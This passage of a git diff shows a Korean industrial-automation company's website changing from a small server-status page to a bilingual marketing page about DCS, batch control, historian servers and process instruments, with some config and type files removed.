"moduleResolution": "bundler",
"isolatedModules": true,
"moduleDetection": "force",
"allowJs": true,
"jsx": "react-jsx",
"paths": {
"@/*": [
"./*"
]
},
"allowImportingTsExtensions": true,
"noEmit": true
}
}

View File

@@ -1,20 +0,0 @@
export interface Message {
role: 'user' | 'model';
text: string;
}
export interface ServiceItem {
id: string;
title: string;
description: string;
icon: string;
image: string;
}
export interface ContactFormData {
name: string;
email: string;
subject: string;
message: string;
}

View File

@@ -1,23 +0,0 @@
import path from 'path';
import { defineConfig, loadEnv } from 'vite';
import react from '@vitejs/plugin-react';
export default defineConfig(({ mode }) => {
const env = loadEnv(mode, '.', '');
return {
server: {
port: 3000,
host: '0.0.0.0',
},
plugins: [react()],
define: {
'process.env.API_KEY': JSON.stringify(env.GEMINI_API_KEY),
'process.env.GEMINI_API_KEY': JSON.stringify(env.GEMINI_API_KEY)
},
resolve: {
alias: {
'@': path.resolve(__dirname, '.'),
}
}
};
});

View File

@@ -1,58 +1,655 @@
<!DOCTYPE html> <!DOCTYPE html>
<html lang="ko"> <html lang="en">
<head> <head>
<meta charset="UTF-8"> <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>한모CNN - 서비스 준비 중</title> <meta name="description" content="한모씨앤앤은 공정제어 전문 기업입니다. 다양한 정보를 확인하세요.">
<style>
body { background-color: #0b0e14; color: #d1d5db; font-family: sans-serif; display: flex; align-items: center; justify-content: center; min-height: 100vh; margin: 0; } <title>한모씨앤앤 | Hanmo Control & Network - DCS SCADA 자동제어</title>
.main-box { text-align: center; border: 1px solid #1f2937; background: #111827; padding: 40px; border-radius: 16px; box-shadow: 0 10px 25px rgba(0,0,0,0.5); width: 350px; } <script src="https://cdn.tailwindcss.com"></script>
h1 { color: #60a5fa; margin-bottom: 5px; letter-spacing: -1px; } <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
.sub-text { color: #9ca3af; margin-bottom: 30px; font-size: 0.9rem; } <link href="https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@200;300;400;500;600;700&family=Space+Grotesk:wght@300;400;500;600;700&display=swap" rel="stylesheet">
.hmi-panel { background: #000; border-radius: 8px; padding: 20px; display: grid; grid-template-columns: 1fr 1fr; gap: 15px; border-left: 4px solid #60a5fa; } <link rel="stylesheet" href="assets/css/style.css">
.sensor { display: flex; flex-direction: column; align-items: center; } <link rel="icon" type="image/x-icon" href="assets/images/favicon.ico">
.s-label { font-size: 0.7rem; color: #6b7280; margin-bottom: 5px; text-transform: uppercase; }
.s-value { font-family: 'Courier New', monospace; font-size: 1.6rem; color: #10b981; font-weight: bold; }
.full-width { grid-column: span 2; border-top: 1px solid #1f2937; padding-top: 10px; margin-top: 5px; }
.update-time { font-size: 0.7rem; color: #374151; margin-top: 25px; }
.blink { animation: fade 2s infinite; }
@keyframes fade { 50% { opacity: 0.3; } }
</style>
</head> </head>
<body> <body class="antialiased">
<div class="main-box">
<h1>HANMO CONTROL & NETWORK CO., LTD.</h1> <!-- RIGHT-CLICK PROTECTION OVERLAY -->
<p class="sub-text">시스템 정식 서비스 준비 중입니다.</p> <!-- <div id="no-rightclick-overlay" style="
<div class="hmi-panel"> position: fixed;
<div class="sensor"> top: 0; left: 0;
<span class="s-label">CPU</span> width: 100%; height: 100%;
<span class="s-value"><span id="cpu">--</span>°C</span> z-index: 9999;
background: transparent;
pointer-events: none;
"></div> -->
<!-- HEADER -->
<header id="main-header" class="fixed top-0 left-0 right-0 z-50 transition-all duration-500 py-6">
<div class="container mx-auto px-6 flex justify-between items-center">
<a href="#home" class="flex items-center gap-3 group">
<div class="bg-blue-600 w-10 h-10 rounded-lg flex items-center justify-center shrink-0 shadow-lg group-hover:bg-blue-700 transition-colors">
<span class="text-white font-bold text-xl font-industrial">H</span>
</div>
<div class="flex flex-col leading-none">
<span id="brand-name" class="font-bold text-xl tracking-tight font-industrial text-white transition-colors duration-300">HANMO</span>
<span id="brand-sub" class="text-[9px] font-bold uppercase tracking-[0.2em] mt-1 text-blue-500">Control & Network</span>
</div>
</a>
<nav class="hidden md:flex gap-10">
<a href="#home" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.home">Home</a>
<a href="#dcs" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.dcs">DCS</a>
<a href="#batch" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.batch">Batch Process</a>
<a href="#dbsvr" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.dbsvr">Database Server</a>
<a href="#products" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.products">Instruments</a>
<a href="#services" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.services">Services</a>
<a href="#about" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.about">About</a>
<a href="#contact" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.contact">Contact</a>
</nav>
<div class="hidden md:flex items-center gap-3">
<!-- 언어 전환 버튼 -->
<div id="lang-container" class="flex rounded-full overflow-hidden border border-white/30 transition-colors duration-300">
<button onclick="switchLang('en')" data-lang="en" class="lang-btn px-3 py-1.5 text-[10px] font-bold font-industrial">EN</button>
<button onclick="switchLang('ko')" data-lang="ko" class="lang-btn px-3 py-1.5 text-[10px] font-bold font-industrial">KO</button>
</div>
<button onclick="location.href='#contact'" class="bg-blue-600 hover:bg-blue-700 text-white px-7 py-2.5 rounded-full text-xs font-bold shadow-xl transition-all active:scale-95 font-industrial tracking-widest uppercase" data-i18n="nav.quote">Inquiry</button>
</div>
<button id="mobile-menu-btn" class="menu-btn md:hidden text-white p-2">
<i class="fas fa-bars text-2xl"></i>
</button>
</div> </div>
<div class="sensor"> </header>
<span class="s-label">NVMe</span>
<span class="s-value"><span id="nvme">--</span>°C</span> <!-- MOBILE MENU -->
</div> <div id="mobile-menu" class="fixed inset-0 z-[60] bg-slate-900 flex flex-col p-8 transition-transform translate-x-full duration-500 overflow-y-auto">
<div class="sensor full-width"> <div class="flex justify-between items-center mb-12">
<span class="s-label">UPTIME</span> <!-- 모바일 언어 전환 -->
<span class="s-value"><span id="days">--</span> DAYS</span> <div class="flex rounded-full overflow-hidden border border-white/30">
<button onclick="switchLang('en')" data-lang="en" class="lang-btn px-4 py-2 text-xs font-bold font-industrial">EN</button>
<button onclick="switchLang('ko')" data-lang="ko" class="lang-btn px-4 py-2 text-xs font-bold font-industrial">KO</button>
</div>
<button id="close-menu-btn" class="text-white text-3xl">&times;</button>
</div> </div>
<nav class="flex flex-col gap-8 text-center">
<a href="#home" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.home">Home</a>
<a href="#dcs" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.dcs">DCS</a>
<a href="#batch" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.batch">Batch Process</a>
<a href="#dbsvr" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.dbsvr">Database Server</a>
<a href="#products" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.products">Instruments</a>
<a href="#services" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.services">Services</a>
<a href="#about" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.about">About</a>
<a href="#contact" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.contact">Contact</a>
<button onclick="location.href='#contact'" class="mt-8 bg-blue-600 hover:bg-blue-700 text-white py-5 rounded-2xl font-bold font-industrial tracking-widest uppercase transition-colors" data-i18n="nav.quote">Inquiry</button>
</nav>
</div> </div>
<div class="update-time">
<span class="blink" style="color:#10b981"></span> LIVE SCAN: <span id="time">--</span> <!-- MAIN CONTENT -->
</div> <main>
</div> <!-- HERO SECTION -->
<script> <section id="home" class="relative min-h-screen flex items-center pt-20 overflow-hidden bg-slate-900">
function update() { <div class="absolute inset-0 z-0 opacity-50">
fetch('status.json?t=' + Date.now()) <img src="assets/images/ControlRoom3.png" alt="Industrial Facility" class="w-full h-full object-cover">
.then(r => r.json()) <div class="absolute inset-0 bg-gradient-to-r from-slate-950 via-slate-900/80 to-transparent"></div>
.then(d => { </div>
document.getElementById('cpu').innerText = d.cpu_temp; <div class="container mx-auto px-6 relative z-10">
document.getElementById('nvme').innerText = d.nvme_temp; <div class="max-w-5xl animate-fade-in">
document.getElementById('days').innerText = d.uptime_days; <div class="inline-block px-4 py-1.5 mb-8 rounded-full bg-blue-600/20 border border-blue-400/30 text-blue-400 text-[10px] font-bold uppercase industrial-tracking font-industrial" data-i18n="hero.badge">Precision Industrial Control</div>
document.getElementById('time').innerText = d.last_update; <h1 class="text-5xl md:text-8xl font-extralight text-white mb-8 hero-title premium-kerning font-premium" data-i18n="hero.title" data-i18n-type="html">
}).catch(() => console.log("Waiting for data...")); Engineering <span class="text-blue-500 font-normal">Precision</span> <br class="hidden md:block"/> Industrial Control
} </h1>
setInterval(update, 10000); update(); <p class="text-lg md:text-xl text-slate-300 mb-12 leading-relaxed max-w-2xl font-premium font-light opacity-80" data-i18n="hero.desc">
</script> Hanmo Control & Network Co., Ltd. provides elite-tier DCS and SCADA architectures for critical infrastructure and modern digital transformation.
</p>
<div class="flex flex-col sm:flex-row gap-5">
<a href="#services" class="bg-blue-600 hover:bg-blue-700 text-white px-10 py-5 rounded-2xl font-bold shadow-2xl transition-all hover:-translate-y-1 text-center font-industrial text-xs tracking-widest uppercase" data-i18n="hero.btn1">Explore Expertise</a>
<a href="#contact" class="bg-white/10 hover:bg-white/20 text-white border border-white/20 backdrop-blur-md px-10 py-5 rounded-2xl font-bold transition-all text-center font-industrial text-xs tracking-widest uppercase" data-i18n="hero.btn2">Consultation</a>
</div>
</div>
<div class="mt-24 grid grid-cols-2 lg:grid-cols-4 gap-4 md:gap-10 max-w-5xl animate-fade-in" style="animation-delay: 0.3s">
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">100+</div>
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold" data-i18n="stat.nodes">Reference Projects</div>
</div>
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">0.01%</div>
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold" data-i18n="stat.uptime">downtime</div>
</div>
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">20+</div>
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold" data-i18n="stat.engineers">Partners</div>
</div>
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">20+</div>
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold" data-i18n="stat.years">Years Excellence</div>
</div>
</div>
</div>
</section>
<!-- DCS Section -->
<section id="dcs" class="py-32 bg-white">
<div class="container mx-auto px-6">
<div class="text-center max-w-3xl mx-auto mb-24">
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="dcs.badge">
Advanced Control Systems
</h2>
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="dcs.title">
DCS Integration
</h3>
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="dcs.desc">
Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications.
</p>
</div>
<div class="grid lg:grid-cols-2 gap-16 items-center max-w-6xl mx-auto">
<!-- 이미지 -->
<div class="aspect-square rounded-[2.5rem] overflow-hidden shadow-2xl">
<img src="assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" alt="DCS Control Room" class="w-full h-full object-cover">
</div>
<div>
<!-- Honeywell 로고 + 설명 (맨 위로 이동) -->
<div class="mb-12">
<img src="assets/images/honeywell-logo.svg" alt="Honeywell Logo" class="h-8 w-auto mb-4 object-contain">
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f0.desc">
Reliable DCS solutions with Honeywell's Experion PKS, ensuring seamless integration and optimal performance
</p>
</div>
<!-- 아이콘 리스트 -->
<div class="space-y-6">
<div class="flex gap-6">
<div class="flex-shrink-0">
<div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white">
<i class="fas fa-shield-alt"></i>
</div>
</div>
<div>
<h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f1.title">Redundant Architecture</h4>
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f1.desc">
Fault-tolerant systems with dual processing units ensuring 99.99% uptime
</p>
</div>
</div>
<div class="flex gap-6">
<div class="flex-shrink-0">
<div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white">
<i class="fas fa-network-wired"></i>
</div>
</div>
<div>
<h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f2.title">Real-time Communication</h4>
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f2.desc">
Sub-millisecond response times with synchronized control across multiple nodes
</p>
</div>
</div>
<div class="flex gap-6">
<div class="flex-shrink-0">
<div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white">
<i class="fas fa-lock"></i>
</div>
</div>
<div>
<h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f3.title">Security Certified</h4>
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f3.desc">
IEC 62443 compliance with military-grade encryption protocols
</p>
</div>
</div>
</div>
<!-- 버튼 -->
<div class="mt-12">
<a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="dcs.btn">
Request Technical Specs
</a>
</div>
</div>
</div>
</div>
</section>
<!-- BATCH PROCESS SECTION -->
<section id="batch" class="py-32 bg-slate-50">
<div class="container mx-auto px-6">
<div class="text-center max-w-3xl mx-auto mb-8"> <!--아래 내용과의 간격 mb-16에서 줄임-->
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="batch.badge">Process Automation</h2>
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="batch.title">Batch Process Control</h3>
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="batch.desc">Not only precision control, but also production planning,process data & historical lot management, you can get it by our Batch Manager software.</p>
</div>
<div class="grid lg:grid-cols-2 gap-8 items-center max-w-6xl mx-auto">
<div>
<div class="space-y-8">
<div class="flex gap-6">
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-tasks"></i></div></div>
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="batch.f1.title">Batch Manager Software</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="batch.f1.desc">Dynamic recipe engine with version control and audit trail capabilities</p></div>
</div>
<div class="flex gap-6">
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-tasks"></i></div></div>
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="batch.f2.title">HC-900 Controller</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="batch.f2.desc">Advanced batch control with integrated HART communication and real-time monitoring</p></div>
</div>
<div class="flex gap-6">
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-tasks"></i></div></div>
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="batch.f3.title">Process Data Management</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="batch.f3.desc">Comprehensive process data collection, storage, and analysis for batch operations</p></div>
</div>
<div class="flex gap-6">
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-chart-bar"></i></div></div>
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="batch.f4.title">Quick Production Setup</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="batch.f4.desc">Real-time batch tracking with predictive quality monitoring</p></div>
</div>
<div class="flex gap-6">
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-check-circle"></i></div></div>
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="batch.f5.title">Easy Historical Tracking</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="batch.f5.desc">FDA 21 CFR Part 11 compliance and complete data integrity</p></div>
</div>
</div>
<!--<div class="mt-12"><a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="batch.btn">Start Implementation</a></div>-->
</div>
<div class="aspect-square rounded-[2.5rem] overflow-hidden shadow-2xl"><img src="assets/images/BatchControl.png" alt="Batch Process" class="w-full h-full object-cover"></div>
</div>
</div>
</section>
<!-- DATABASE SERVER SECTION -->
<section id="dbsvr" class="py-32 bg-white">
<div class="container mx-auto px-6">
<div class="text-center max-w-3xl mx-auto mb-24">
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="db.badge">Data Infrastructure</h2>
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="db.title">Database Server Solutions</h3>
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="db.desc">Mission-critical historian and data management infrastructure for continuous industrial operations.</p>
</div>
<div class="grid md:grid-cols-3 gap-8 max-w-6xl mx-auto">
<div class="bg-slate-50 rounded-[2.5rem] p-10 border border-slate-100 hover:border-blue-200 transition-all hover:shadow-xl">
<div class="w-16 h-16 bg-blue-600 rounded-2xl flex items-center justify-center mb-8 text-white text-2xl"><i class="fas fa-database"></i></div>
<h4 class="text-2xl font-semibold text-slate-900 mb-4 font-premium" data-i18n="db.c1.title">High-Performance Historian</h4>
<p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="db.c1.desc">SQL Server-based architecture optimized for 1M+ data points per second with sub-second query response</p>
<ul class="space-y-3 text-sm text-slate-600">
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Time-series optimization</li>
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Automatic compression</li>
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Hot-cold storage</li>
</ul>
</div>
<div class="bg-slate-50 rounded-[2.5rem] p-10 border border-slate-100 hover:border-blue-200 transition-all hover:shadow-xl">
<div class="w-16 h-16 bg-blue-600 rounded-2xl flex items-center justify-center mb-8 text-white text-2xl"><i class="fas fa-shield-alt"></i></div>
<h4 class="text-2xl font-semibold text-slate-900 mb-4 font-premium" data-i18n="db.c2.title">Disaster Recovery</h4>
<p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="db.c2.desc">Geo-redundant replication with RTO &lt; 15 minutes and RPO &lt; 5 minutes</p>
<ul class="space-y-3 text-sm text-slate-600">
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Multi-site failover</li>
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Continuous backup</li>
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Zero data loss</li>
</ul>
</div>
<div class="bg-slate-50 rounded-[2.5rem] p-10 border border-slate-100 hover:border-blue-200 transition-all hover:shadow-xl">
<div class="w-16 h-16 bg-blue-600 rounded-2xl flex items-center justify-center mb-8 text-white text-2xl"><i class="fas fa-lock"></i></div>
<h4 class="text-2xl font-semibold text-slate-900 mb-4 font-premium" data-i18n="db.c3.title">Security & Compliance</h4>
<p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="db.c3.desc">Role-based access control, encryption at rest/transit, and full audit logging</p>
<ul class="space-y-3 text-sm text-slate-600">
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> ISO 27001 certified</li>
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> CCPA/GDPR compliant</li>
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Immutable logs</li>
</ul>
</div>
</div>
<!-- <div class="text-center mt-16"><a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="db.btn">Get Infrastructure Consultation</a></div> -->
</div>
</section>
<!-- INSTRUMENTS SECTION -->
<section id="products" class="py-32 bg-slate-50">
<div class="container mx-auto px-6">
<div class="text-center max-w-3xl mx-auto mb-12">
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="inst.badge">Precision Measurement</h2>
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="inst.title">Control Instruments</h3>
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="inst.desc">Optimal Precision Starts with Understanding of Your Environment</p>
</div>
<div class="grid md:grid-cols-2 lg:grid-cols-4 gap-8">
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-water text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i1.title">Flow Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i1.desc">Magnetic, Coriolis, and vortex flow meters with ±0.5% accuracy</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Endress+Hauser</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Flownics</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Azbil , Honeywell</div></div>
<!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div>
</div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-gauge-high text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i2.title">Pressure Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i2.desc">Differential and absolute pressure sensors for ultra-high sensitivity</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Azbil</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Honeywell</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Autonics , Endress+Hauser</div></div>
<!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div>
</div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-thermometer-half text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i3.title">Temperature Sensors</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i3.desc">RTD, thermocouple, and infrared temperature measurement</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Autonics</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Azbil</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Honeywell , Endress+Hauser</div></div>
<!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div>
</div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-fill-drip text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i4.title">Level Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i4.desc">Ultrasonic, radar, capacitive and float level sensors</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Endress+Hauser</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Seojin Instec</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Hanil Level</div></div>
<!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div>
</div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-flask text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i5.title">Analytical Sensors</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i5.desc">pH, conductivity, oxygen, and dissolved gas analyzers</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Honeywell Analytics</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Toa DKK</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Gastron</div></div>
<!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div>
</div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-faucet text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i6.title">Control Valves</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i6.desc">Smart positioners with HART communication</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Komoto (Motoyama Korea)</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Azbil</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Honeywell</div></div>
<!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div>
</div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><svg class="w-16 h-16 text-blue-300 group-hover:text-blue-600 transition-colors"><use href="assets/images/icons/icons.svg#icon-xv"></use></svg></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i7.title">Shutoff Valves</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i7.desc">Accelerometers and velocity sensors for predictive maintenance</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Automa</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Proval</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Flowserve</div></div>
<!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div>
</div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-microchip text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
